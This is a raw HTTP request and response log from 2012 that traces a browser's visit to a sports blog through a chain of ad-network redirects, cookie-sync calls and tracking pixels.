GET /v2/cexposer/SIG=15s0sijch/*http%3A//ad.yieldmanager.com/imp?anmember=514&anprice=80&Z=300x250&s=1651067&r=0&_salt=698192661&u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&u=http://fenwaywest.com/media/index.php HTTP/1.1

Host: cookex.amp.yahoo.com
GET /v2/cexposer/SIG=15s0sijch/*http%3A//ad.yieldmanager.com/imp?anmember=514&amp;anprice=80&amp;Z=300x250&amp;s=1651067&amp;r=0&amp;_salt=698192661&amp;u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;u=http://fenwaywest.com/media/index.php HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: B=4leg2ah8ajcn5&amp;b=3&amp;s=05
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Date: Mon, 19 Nov 2012 04:17:42 GMT
P3P: policyref=&quot;http://info.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV&quot;
Location: http://ad.yieldmanager.com/imp?anmember=514&amp;anprice=80&amp;Z=300x250&amp;s=1651067&amp;r=0&amp;_salt=698192661&amp;u=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;u=http://fenwaywest.com/media/index.php&amp;SIG=10v8trh4u;x-cookie=4yrt2nu8nwpa5&amp;o=3&amp;f=05
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Cache-Control: private
GET /cms/v1?esig=1~17e68b1b86afcfd8436104fe567484ccc2161b0f&nwid=10000602235&sigv=1 HTTP/1.1

Host: ad.yieldmanager.com
GET /cms/v1?esig=1~17e68b1b86afcfd8436104fe567484ccc2161b0f&amp;nwid=10000602235&amp;sigv=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
Cookie: testbounce=testing; BX=4leg2ah8ajcn5&amp;b=3&amp;s=05&amp;t=323; uid=uid=0faa594a-3200-11e2-a63c-3c4a92f73a52&amp;_hmacv=1&amp;_salt=2355797717&amp;_keyid=k1&amp;_hmac=88d94038a1661dd49604c657f05bcd10198581d9; RMBX=4leg2ah8ajcn5&amp;b=3&amp;s=05&amp;t=323
HTTP/1.1 302 Found

Content-Type: text/plain; charset=utf-8
Date: Mon, 19 Nov 2012 04:17:42 GMT
P3P: policyref=&quot;http://p3p.yahoo.com/w3c/p3p.xml&quot;, CP=&quot;CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV&quot;
Location: http://ib.adnxs.com/ymapuid?xid=g_7cQLV97bQAAa77n84znL3a
Cache-Control: private
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
Server: YTS/1.20.13
GET /pixel/p-56WJ0KtIxWJ_2.gif?r=0.9693297934782868 HTTP/1.1

Host: pixel.quantserve.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/bdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html
Cookie: mc=50a9b2e0-21a09-68164-7c0b5
HTTP/1.1 200 OK

Content-Type: image/gif
Connection: close
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Mon, 19 Nov 2012 04:17:42 GMT
Server: QS
GET /dmm/contextweb/match HTTP/1.1

Host: contextweb-match.dotomi.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 204 No Content

Content-Type: text/plain
Date: Mon, 19 Nov 2012 04:17:42 GMT
X-Name: dtiad01rtb18p.int
Cache-Control: max-age=0, no-store
Content-Length: 0
Connection: close
GET /getuid?http://ce.lijit.com/merge?pid=12&3pid=$UID HTTP/1.1

Host: ib.adnxs.com
GET /getuid?http://ce.lijit.com/merge?pid=12&amp;3pid=$UID HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=1353298658700ebc440fd1c19&amp;rand=1353298658700&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]14FQUoEhxBTqzB-6V-ZbE(V4S@'0FP`9QQoY]&gt;5y9nKjMD7)=Bn$9U.B!+^@bhR!vJ; sess=1; icu=ChII4LcDEAoYASABKAEw4eWmhQUKEgjrhgQQChgCIAIoAjDl5aaFBRDl5aaFBRgC; acb141525=![nC'XI()vG)#E&lt;0nf8M-odmF?enc=AAAAAAAA4D8zMzMzMzPbPwAAAAAAAOA_MzMzMzMz2z8AAAAAAADgP0Z8MTD2gf9soArzhH1cTlHisqlQAAAAAKyWCAACAgAANQEAAAIAAAALpjYA51gBAAAAAQBVU0QAVVNEAKAAWAIHXAAA2k8BAgUCAQUAAAAAPRohpgAAAAA.&amp;tt_code=653070&amp;cnd=%21Mx-g3QiC7CQQi8zaARgAIOexBTAAOIe4AUAASLUCUKytIlgAYNgGaABwpAF4OoABihSIATqQAQGYAQGgAQGoAQOwAQC5AQAAAAAAAOA_wQEAAAAAAADgP8kBmpmZmZmZuT_ZAQAAAAAAAPA_4AEA&amp;udj=uf%28%27a%27%2C+40624%2C+1353298658%29%3Buf%28%27r%27%2C+3581451%2C+1353298658%29%3Bppv%2827656%2C+%277854139169527921734%27%2C+1353298658%2C+1353557858%2C+603650%2C+88295%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21sgWWMQiC7CQQi8zaARjnsQUgAA..&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1; acb781631=![nC'208WMH_XsA&gt;bPMv.la1I?enc=AAAAAAAA8D8zMzMzMzPrPwAAAAAAAPA_MzMzMzMz6z8AAAAAAADwP6YtCyYrnZ5yoArzhH1cTlHlsqlQAAAAAK-WCAACAgAANQEAAAIAAAAHpjYA51gBAAAAAQBVU0QAVVNEACwB-gAHXAAAvk0BAgUCAQUAAAAAdRnNaAAAAAA.&amp;tt_code=1651067&amp;cnd=%215B_-FAiC7CQQh8zaARgAIOexBTAAOIe4AUAASLUCUK-tIlgAYNgGaABwlAZ41gGAAYoUiAE6kAEBmAEBoAEBqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmbk_2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+40624%2C+1353298661%29%3Buf%28%27r%27%2C+3581447%2C+1353298661%29%3Bppv%2827656%2C+%278259211575291489702%27%2C+1353298661%2C+1353557861%2C+603650%2C+88295%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21rgVuMQiC7CQQh8zaARjnsQUgAA..&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1
HTTP/1.1 302 Moved

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sun, 17-Feb-2013 04:17:42 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Tue, 20-Nov-2012 04:17:42 GMT; domain=.adnxs.com; HttpOnly
Location: http://ce.lijit.com/merge?pid=12&amp;3pid=5858721859426781856
Date: Mon, 19 Nov 2012 04:17:42 GMT
Content-Length: 0
GET /ymapuid?xid=g_7cQLV97bQAAa77n84znL3a HTTP/1.1

Host: ib.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]14FQUoEhxBTqzB-6V-ZbE(V4S@'0FP`9QQoY]&gt;5y9nKjMD7)=Bn$9U.B!+^@bhR!vJ; sess=1; icu=ChII4LcDEAoYASABKAEw4eWmhQUKEgjrhgQQChgCIAIoAjDl5aaFBRDl5aaFBRgC; acb141525=![nC'XI()vG)#E&lt;0nf8M-odmF?enc=AAAAAAAA4D8zMzMzMzPbPwAAAAAAAOA_MzMzMzMz2z8AAAAAAADgP0Z8MTD2gf9soArzhH1cTlHisqlQAAAAAKyWCAACAgAANQEAAAIAAAALpjYA51gBAAAAAQBVU0QAVVNEAKAAWAIHXAAA2k8BAgUCAQUAAAAAPRohpgAAAAA.&amp;tt_code=653070&amp;cnd=%21Mx-g3QiC7CQQi8zaARgAIOexBTAAOIe4AUAASLUCUKytIlgAYNgGaABwpAF4OoABihSIATqQAQGYAQGgAQGoAQOwAQC5AQAAAAAAAOA_wQEAAAAAAADgP8kBmpmZmZmZuT_ZAQAAAAAAAPA_4AEA&amp;udj=uf%28%27a%27%2C+40624%2C+1353298658%29%3Buf%28%27r%27%2C+3581451%2C+1353298658%29%3Bppv%2827656%2C+%277854139169527921734%27%2C+1353298658%2C+1353557858%2C+603650%2C+88295%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21sgWWMQiC7CQQi8zaARjnsQUgAA..&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1; acb781631=![nC'208WMH_XsA&gt;bPMv.la1I?enc=AAAAAAAA8D8zMzMzMzPrPwAAAAAAAPA_MzMzMzMz6z8AAAAAAADwP6YtCyYrnZ5yoArzhH1cTlHlsqlQAAAAAK-WCAACAgAANQEAAAIAAAAHpjYA51gBAAAAAQBVU0QAVVNEACwB-gAHXAAAvk0BAgUCAQUAAAAAdRnNaAAAAAA.&amp;tt_code=1651067&amp;cnd=%215B_-FAiC7CQQh8zaARgAIOexBTAAOIe4AUAASLUCUK-tIlgAYNgGaABwlAZ41gGAAYoUiAE6kAEBmAEBoAEBqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmbk_2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+40624%2C+1353298661%29%3Buf%28%27r%27%2C+3581447%2C+1353298661%29%3Bppv%2827656%2C+%278259211575291489702%27%2C+1353298661%2C+1353557861%2C+603650%2C+88295%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21rgVuMQiC7CQQh8zaARjnsQUgAA..&amp;vpid=124&amp;media_subtypes=1&amp;dlo=1
HTTP/1.1 200 OK

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sun, 17-Feb-2013 04:17:42 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Tue, 20-Nov-2012 04:17:42 GMT; domain=.adnxs.com; HttpOnly uuid2=5858721859426781856; path=/; expires=Sun, 17-Feb-2013 04:17:42 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 19 Nov 2012 04:17:42 GMT
Content-Length: 0
GET /lj_match?r=1353298662245 HTTP/1.1

Host: um.simpli.fi

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=1353298658700ebc440fd1c19&amp;rand=1353298658700&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
HTTP/1.1 302 Moved Temporarily

Content-Type: text/plain
Server: nginx
Date: Mon, 19 Nov 2012 04:17:42 GMT
Transfer-Encoding: chunked
Connection: close
Set-Cookie: uid=7pq52t7ykTScBPbInO0TlJ%3D%3D; path=/; expires=Tue, 19 Nov 2013 04:17:42 GMT; domain=.simpli.fi
Location: http://ce.lijit.com/merge?pid=2&amp;3pid=DAB99AEE3491F2DEC8F6049C9413ED9C
P3P: policyref=&quot;http://www.simplifi.com/w3c/Policies.xml&quot;, CP=&quot;ADMa DEVa PSAa PSDa OUR IND DSP NON COR&quot;
GET /cm?in=1&pub=1827 HTTP/1.1

Host: p.rfihub.com
GET /cm?in=1&amp;pub=1827 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=1353298658700ebc440fd1c19&amp;rand=1353298658700&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
HTTP/1.1 302 Found

HTTP/1.1 302 Found
P3P: CP=&quot;NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT&quot;
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: s6=1353298662415;Path=/;Domain=.rfihub.com;Expires=Fri, 08-May-15 04:17:42 GMT u=&quot;aABQoWxQQ==AI3Yyfww==AAABOxbi1A8=&quot;;Path=/;Domain=.rfihub.com;Expires=Fri, 08-May-15 04:17:42 GMT e=cr;Path=/;Domain=.rfihub.com;Expires=Fri, 08-May-15 04:17:42 GMT a=c638103774108863402;Path=/;Domain=.rfihub.com;Expires=Fri, 08-May-15 04:17:42 GMT j=c638103774108863402;Path=/;Domain=.rfihub.com r=1353298662415;Path=/;Domain=.rfihub.com;Expires=Fri, 08-May-15 04:17:42 GMT o=1-8wjRgbiRTjyi;Path=/;Domain=.rfihub.com;Expires=Fri, 08-May-15 04:17:42 GMT p=1-8wjRgbiRTjyi;Path=/;Domain=.rfihub.com
Location: http://ce.lijit.com/merge?pid=10&amp;3pid=638103774108863402&amp;forward=
Content-Length: 0
GET /sync/img?mt_exid=17&redirect=http%3A%2F%2Fce.lijit.com%2Fmerge%3Fpid%3D3%263pid%3D%5BMM_UUID%5D HTTP/1.1

Host: sync.mathtag.com
GET /sync/img?mt_exid=17&amp;redirect=http%3A%2F%2Fce.lijit.com%2Fmerge%3Fpid%3D3%263pid%3D%5BMM_UUID%5D HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=1353298658700ebc440fd1c19&amp;rand=1353298658700&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: uuid=50a9b2e2-9d68-d676-6901-3c5fafca2592; mt_mop=11:1353298658
HTTP/1.1 302 Found

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:42 GMT
Content-Length: 0
Connection: keep-alive
Server: mt2/2.6.2.2465 Sep 24 2012 22:21:34 zrh-pixel-x6 pid 0x1586 5510
Cache-Control: no-cache
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Set-Cookie: mt_mop=11:1353298658|17:1353298662; domain=.mathtag.com; path=/; expires=Wed, 19-Dec-2012 04:17:42 GMT
Location: http://ce.lijit.com/merge?pid=3&amp;3pid=50a9b2e2-9d68-d676-6901-3c5fafca2592
GET /match?p=31&ord=20120711T025630 HTTP/1.1

Host: match.rtbidder.net
GET /match?p=31&amp;ord=20120711T025630 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=1353298658700ebc440fd1c19&amp;rand=1353298658700&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
HTTP/1.1 302 Moved Temporarily

Content-Type: text/plain
Server: rtbidder
Date: Mon, 19 Nov 2012 04:17:42 GMT
Content-Length: 233
P3P: policyref=&quot;http://match.rtbidder.net/p3p.xml&quot;, CP=&quot;NOI DSP COR CURa ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo HISa TELo OUR STP&quot;
Pragma: no-cache
Set-Cookie: bsuid=%3EtYgd%3A%24JyVk%3A%27h0; path=/; domain=.rtbidder.net; expires=Sun, 17-Feb-2013 04:17:42 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-store, no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://ce.lijit.com/merge?pid=13&amp;3pid=50a9b2e6448a550dd77e72ed
GET /site=782471/size=160600/u=2/bnum=70770769/wkhr=29/hr=5/hl=1/scres=5/swh=1176x885/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/dref=http%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html HTTP/1.1

Host: r1.ace.advertising.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?bV5bEg73CQDE7YEAAAAAAO.-IAAAAAAAAgAAAAoAAAAAAP8AAAACBnhSEwAAAAAAlWQrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnxEqrZZfyDOO0V2t1xdAjbOQCb-ysJXB92.sNAAAAAA==,,http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2Fbackuptags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04lijit_scraper..html,B%3D1%26Z%3D160x600%26_salt%3D1488817%26anmember%3D514%26anprice%3D40%26r%3D0%26s%3D653070,0fabe2ec-3200-11e2-9d8b-3c4a92f73a52,1353298661884
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Date: Mon, 19 Nov 2012 04:17:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP=&quot;NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV&quot;, an.n=&quot;Advertising.com&quot;, an.pp=&quot;http://advertising.aol.com/privacy/advertisingcom&quot;, an.oo=&quot;http://advertising.aol.com/privacy/advertisingcom/opt-out&quot;, an.by=&quot;Y&quot;
Location: http://r1.ace.advertising.com/ctst=1/site=782471/size=160600/u=2/bnum=70770769/wkhr=29/hr=5/hl=1/scres=5/swh=1176x885/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/dref=http%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
Set-Cookie: ACID=jN800013532986620009; domain=advertising.com; expires=Wed, 19-Nov-2014 04:17:42 GMT; path=/ ASCID=jN800013532986620009; domain=advertising.com; path=/
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 19 Nov 2012 04:17:42 GMT
Content-Length: 430
GET /m/lj?r=1353298662245 HTTP/1.1

Host: lj.d.chango.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=1353298658700ebc440fd1c19&amp;rand=1353298658700&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
HTTP/1.1 200 OK

Content-Type: image/gif
Content-Length: 35
Server: RTB
Etag: &quot;0f4e929dd5bb2564f7ab9c76338e04e292a42ace&quot;
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref=&quot;http://as.chango.com/static/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR DEVa TAIa OUR BUS UNI&quot;
Set-Cookie: _t=100b3eb8-3200-11e2-934d-00259036ff0a; Domain=chango.com; expires=Thu, 17 Nov 2022 04:17:42 GMT; Path=/
Connection: close
POST / HTTP/1.1

Host: ocsp.entrust.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 103
Content-Type: application/ocsp-request
HTTP/1.0 200 OK

Content-Type: application/ocsp-response
Content-Transfer-Encoding: Binary
Content-Length: 1938
Connection: Close
GET /1x1.gif HTTP/1.1

Host: ssl-i.cdn.openx.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069794370173199&amp;rnd=4536012200332245263&amp;fpid=12&amp;nu=y&amp;t=&amp;sp=n&amp;purl=&amp;ctid=3&amp;cyid=11
HTTP/1.1 200 OK

Content-Type: image/gif
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 28 Jun 2010 20:43:04 GMT
Etag: &quot;3f39-327-48a1d2ad30600&quot;
Accept-Ranges: bytes
Content-Length: 807
Date: Mon, 19 Nov 2012 04:17:42 GMT
Connection: keep-alive
X-N: S
GET /ctst=1/site=782471/size=160600/u=2/bnum=70770769/wkhr=29/hr=5/hl=1/scres=5/swh=1176x885/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/dref=http%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html HTTP/1.1

Host: r1.ace.advertising.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?bV5bEg73CQDE7YEAAAAAAO.-IAAAAAAAAgAAAAoAAAAAAP8AAAACBnhSEwAAAAAAlWQrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnxEqrZZfyDOO0V2t1xdAjbOQCb-ysJXB92.sNAAAAAA==,,http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2Fbackuptags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04lijit_scraper..html,B%3D1%26Z%3D160x600%26_salt%3D1488817%26anmember%3D514%26anprice%3D40%26r%3D0%26s%3D653070,0fabe2ec-3200-11e2-9d8b-3c4a92f73a52,1353298661884
Cookie: ACID=jN800013532986620009; ASCID=jN800013532986620009
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Date: Mon, 19 Nov 2012 04:17:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP=&quot;NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV&quot;, an.n=&quot;Advertising.com&quot;, an.pp=&quot;http://advertising.aol.com/privacy/advertisingcom&quot;, an.oo=&quot;http://advertising.aol.com/privacy/advertisingcom/opt-out&quot;, an.by=&quot;Y&quot;
Comscore: CMXID=2115.1004220.782471.0XMC
